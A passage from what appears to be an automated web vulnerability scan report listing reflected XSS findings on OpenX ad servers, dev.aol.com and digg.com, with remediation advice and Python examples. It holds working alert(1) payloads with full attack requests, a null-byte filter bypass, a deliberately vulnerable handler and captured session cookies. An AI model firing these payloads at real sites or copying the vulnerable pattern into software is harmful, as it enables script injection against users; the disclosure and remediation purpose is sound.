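# _ and $ joined by dots. Brackets, quotes, spaces and < never match.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$")
ALLOWED_CATS = {"map", "hyb", "sat"}                 # values seen in the report's requests
COVERAGE = {"map": [{"opt": False, "id": "map"}]}    # constructed stand-in for the real payload


def _params(environ):
    # parse_qs decodes %2C etc.; first value wins for repeated keys.
    return {k: v[0] for k, v in parse_qs(environ.get("QUERY_STRING", "")).items()}


def vulnerable_app(environ, start_response):
    """Reproduces the three reflections: callback name, rejected value, raw query string."""
    p = _params(environ)
    cats = p.get("cat", "").split(",")
    unknown = [c for c in cats if c not in ALLOWED_CATS]
    if unknown:
        # Finding 5.71: the 400 body is the rejected value in single quotes, text/plain.
        start_response("400 BAD REQUEST", [("Content-Type", "text/plain")])
        return [repr(unknown[0]).encode()]
    # Findings 5.72 and 5.73: unvalidated callback, query string echoed as 2nd argument.
    body = "%s(%s,%s)" % (p.get("jsonp", "callback"), json.dumps(COVERAGE),
                          json.dumps(environ.get("QUERY_STRING", "")))
    start_response("200 OK", [("Content-Type", "text/javascript")])
    return [body.encode()]


def hardened_app(environ, start_response):
    p = _params(environ)
    cb = p.get("jsonp", "")
    cats = p.get("cat", "").split(",")
    err_headers = [("Content-Type", "text/plain; charset=utf-8"),
                   ("X-Content-Type-Options", "nosniff")]
    # 1. Whitelist the callback name and never echo a rejected one.
    if not CALLBACK_RE.match(cb):
        start_response("400 Bad Request", err_headers)
        return [b"invalid jsonp callback"]
    # 2. Enumerated values get the same treatment: name the field, not the input.
    if not all(c in ALLOWED_CATS for c in cats):
        start_response("400 Bad Request", err_headers)
        return [b"unknown cat value"]
    # 3. No query-string echo. The /**/ prefix stops the body from starting with
    #    attacker-chosen bytes (the Rosetta Flash trick); nosniff stops HTML sniffing.
    body = "/**/%s(%s)" % (cb, json.dumps(COVERAGE))
    start_response("200 OK", [("Content-Type", "application/javascript; charset=utf-8"),
                              ("X-Content-Type-Options", "nosniff")])
    return [body.encode()]


def call(app, query_string):
    """Minimal offline WSGI driver: returns (status, headers dict, body text)."""
    captured = {}

    def start_response(status, headers):
        captured["status"], captured["headers"] = status, dict(headers)

    environ = {"REQUEST_METHOD": "GET", "QUERY_STRING": query_string}
    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body.decode()


if __name__ == "__main__":
    # The query string from finding 5.72, as captured in the report.
    q = "format=json&jsonp=MQA._covCallback4ce5e<script>alert(1)</script>96b4cb561f0&cat=map%2Chyb%2Csat"
    for app in (vulnerable_app, hardened_app):
        status, _, body = call(app, q)
        print(app.__name__, status, body[:80])
```

The 46-byte 400 body the vulnerable handler produces for the cat payload is byte-for-byte the one captured in finding 5.71, which is a useful sanity check that the reconstruction of the pattern is right before trusting the hardened version.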

5.74. http://d.tradex.openx.com/afr.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks (the setTimeout argument that rebuilds the refresh URL). The payload 64156</script><script>alert(1)</script>5e557625608 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response is an HTML page, and the HTML parser closes a script block at the first </script> it meets regardless of JavaScript string quoting, so the injected <script>alert(1)</script> is parsed as markup and executes without any quote having to be closed.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the refresh URL is rebuilt from request parameters inside a string handed to setTimeout; the parameter values should be URL-encoded when the URL is assembled, and the resulting string escaped for a JavaScript literal (including the sequence </script, which ends the script block whatever the quoting) before it is written into the page. Passing a function rather than a string to setTimeout removes the second evaluation layer altogether.

Request

GET /afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE64156</script><script>alert(1)</script>5e557625608 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=0318609e4899f4eef14c1bdd55dccb7d; expires=Fri, 04-May-2012 00:59:53 GMT; path=/
Content-Length: 3654
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE64156</script><script>alert(1)</script>5e557625608&loc=")', 65000);
// ]]>
...[SNIP]...

5.75. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19a0</script><script>alert(1)</script>1f2595708be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE&a19a0</script><script>alert(1)</script>1f2595708be=1 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=41ceb160f94c774738d19cd8e91c39ef; expires=Fri, 04-May-2012 01:00:00 GMT; path=/
Content-Length: 3660
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE&a19a0</script><script>alert(1)</script>1f2595708be=1&loc=")', 65000);
// ]]>
...[SNIP]...

5.76. http://d.tradex.openx.com/afr.php [zoneid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the zoneid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 767dd</script><script>alert(1)</script>21a4c215031 was submitted in the zoneid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=65&zoneid=3606767dd</script><script>alert(1)</script>21a4c215031&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f74278266cdb1b8473acb25c7b316621; expires=Fri, 04-May-2012 00:59:42 GMT; path=/
Content-Length: 853
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=65&zoneid=3606767dd</script><script>alert(1)</script>21a4c215031&cb=INSERT_RANDOM_NUMBER_HERE&loc=")', 65000);
// ]]>
...[SNIP]...

5.77. http://dev.aol.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44dac"-alert(1)-"5c1e0974f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?44dac"-alert(1)-"5c1e0974f61=1 HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304610976566-Repeat%7C1367682976566%3B%20s_nrgvo%3DRepeat%7C1367682976568%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 11:10:48 GMT
Server: Apache
Set-Cookie: RSP_DAEMON=db7023215051147ee79a8596304debb9; path=/; HttpOnly
Set-Cookie: RSP_DAEMON=a41cc5d6c93fa2f59be7062a842ab853; path=/; HttpOnly
Set-Cookie: SESSad0659a5e17377ebcd7da6b8d8fff621=ba17ae41e03a9b08a1801ca15dd2dc35; path=/; domain=.dev.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Cteonnt-Length: 16122
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
op1=s_265.pfxID + " : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/?44dac"-alert(1)-"5c1e0974f61=1"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...
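
The OpenX findings (5.74 to 5.76) and the dev.aol.com findings (5.77 to 5.81) share one sink: a request-derived string written into a JavaScript string literal inside an inline script on an HTML page. OpenX rebuilds its refresh URL inside setTimeout('...'), where </script> ends the script block; dev.aol.com records the page URL in s_265.prop12="...", where a double quote closes the literal. The following is an added example, not OpenX's or AOL's code, showing the two things that have to happen: URL-encode parameter values when a URL is assembled, and escape the result for a JavaScript string in a way that also neutralises < (json.dumps alone leaves </script> intact). The payloads are the ones from the report; the output shapes follow the captured responses.

```python
"""Safely embedding request data in an inline <script> block.

Added example for findings 5.74-5.81, not OpenX or dev.aol.com code.
OPENX_CB and AOL_URL are the payloads captured in the report.
"""
import json
from urllib.parse import urlencode

OPENX_CB = "INSERT_RANDOM_NUMBER_HERE64156</script><script>alert(1)</script>5e557625608"
AOL_URL = 'http://dev.aol.com/?44dac"-alert(1)-"5c1e0974f61=1'


def js_string_in_html(value):
    """JSON-encode `value` as a JavaScript string literal that is safe inside <script>.

    json.dumps escapes quotes, backslashes, control characters and (with the
    default ensure_ascii=True) the line terminators U+2028/U+2029, but it leaves
    < > & alone. The HTML parser ends a script block at the first </script> even
    inside a string literal, so those three are written as \\uXXXX escapes, which
    JavaScript decodes back to the original characters.
    """
    out = json.dumps(value)
    return out.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def roundtrip_ok(value):
    """The escaped literal still denotes the same string (json.loads stands in for the JS parser)."""
    return json.loads(js_string_in_html(value)) == value


def naive_openx_refresh(refresh, zoneid, cb):
    """The vulnerable shape from the report: raw values concatenated into a URL,
    concatenated into a string that setTimeout evaluates."""
    url = "http://d.tradex.openx.com/afr.php?refresh=%s&zoneid=%s&cb=%s&loc=" % (refresh, zoneid, cb)
    return ("<script type=\"text/javascript\">\n"
            "setTimeout('window.location.replace(\"%s\")', %s000);\n"
            "</script>" % (url, refresh))


def hardened_openx_refresh(refresh, zoneid, cb):
    """URL-encode each parameter, escape the URL for a JS literal, pass a function to setTimeout."""
    refresh_s = int(refresh)                      # the refresh interval must be an integer
    url = "http://d.tradex.openx.com/afr.php?" + urlencode(
        {"refresh": refresh_s, "zoneid": zoneid, "cb": cb, "loc": ""})
    return ("<script type=\"text/javascript\">\n"
            "setTimeout(function () { window.location.replace(%s); }, %d);\n"
            "</script>" % (js_string_in_html(url), refresh_s * 1000))


def analytics_prop_line(page_url):
    """The dev.aol.com sink, s_265.prop12="<url>", with the URL escaped for a JS literal."""
    return "s_265.prop12=%s" % js_string_in_html(page_url)


if __name__ == "__main__":
    print(naive_openx_refresh("65", "3606", OPENX_CB))
    print(hardened_openx_refresh("65", "3606", OPENX_CB))
    print(analytics_prop_line(AOL_URL))
```

The URL-encoding step is the one that fixes the data at its source: once the cb value reads %3C%2Fscript%3E the URL is correct as a URL and cannot contain a raw <. The JS-string step protects the places where the page still has to embed an arbitrary string, such as the analytics property that records the full request URL, including the path components that findings 5.78 to 5.81 inject into.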

5.78. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0aa8"-alert(1)-"51d1db99da0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themesa0aa8"-alert(1)-"51d1db99da0/zen/dac_2009/favicon.ico HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:10:55 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
_265.pfxID + " : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themesa0aa8"-alert(1)-"51d1db99da0/zen/dac_2009/favicon.ico"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.79. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 382d8"-alert(1)-"22026a1b8d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes/zen382d8"-alert(1)-"22026a1b8d3/dac_2009/favicon.ico HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:10:57 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
.pfxID + " : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themes/zen382d8"-alert(1)-"22026a1b8d3/dac_2009/favicon.ico"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.80. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e49c1"-alert(1)-"ff73b5a19e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes/zen/dac_2009e49c1"-alert(1)-"ff73b5a19e7/favicon.ico HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:10:59 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
" : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themes/zen/dac_2009e49c1"-alert(1)-"ff73b5a19e7/favicon.ico"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.81. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67568"-alert(1)-"863d34e5ea4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes/zen/dac_2009/favicon.ico67568"-alert(1)-"863d34e5ea4 HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:11:01 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:11:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
aolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themes/zen/dac_2009/favicon.ico67568"-alert(1)-"863d34e5ea4"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.82. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b2815"><script>alert(1)</script>03c666340fe was submitted in the REST URL parameter 1. This input was echoed as b2815"><script>alert(1)</script>03c666340fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /%00b2815"><script>alert(1)</script>03c666340fe HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-779404137262479208%3A203; expires=Fri, 06-May-2011 10:53:04 GMT; path=/; domain=digg.com
Set-Cookie: d=d50133d15ecf2dcd7ba69de08580494f90965e3d73b97e5fa32ac2711cba5273; expires=Tue, 04-May-2021 21:00:44 GMT; path=/; domain=.digg.com
X-Digg-Time: D=600466 10.2.128.119
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17123

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/%00b2815"><script>alert(1)</script>03c666340fe.rss">
...[SNIP]...

